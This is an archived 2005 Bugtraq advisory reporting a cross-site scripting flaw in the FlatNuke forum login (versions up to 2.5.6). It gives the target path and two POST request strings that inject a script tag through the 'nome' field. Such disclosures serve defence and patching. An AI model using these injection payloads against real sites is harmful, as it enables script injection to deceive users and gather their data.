[40867] in bugtraq
Flat Nuke Cross Site Scripting
daemon@ATHENA.MIT.EDU (alex@aleksanet.com)
Mon Oct 24 19:03:23 2005
Date: 24 Oct 2005 00:05:45 -0000
Message-ID: <20051024000545.19556.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: alex@aleksanet.com
To: bugtraq@securityfocus.com
Web Site:
Vulnerable: FlatNuke <= 2.5.6
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks
Malicious users may inject JavaScript, VBScript, ActiveX, into a vulnerable application to fool a user in order to gather data from them.
Affects http://[target]TEST/flatnuke-2.5.6/forum/index.php
The script has been tested with these POST variables:
op=login&nome=<script>alert('LOL');</script>®pass=1&reregpass=1&anag=1&email=1&homep=http%3A%2F%2F&prof=1&prov=1&ava=1&url_avatar=1&firma=1
op=login&from=home&nome=<script>alert('LOL');</script>&logpassword=1
Best Regards
Alex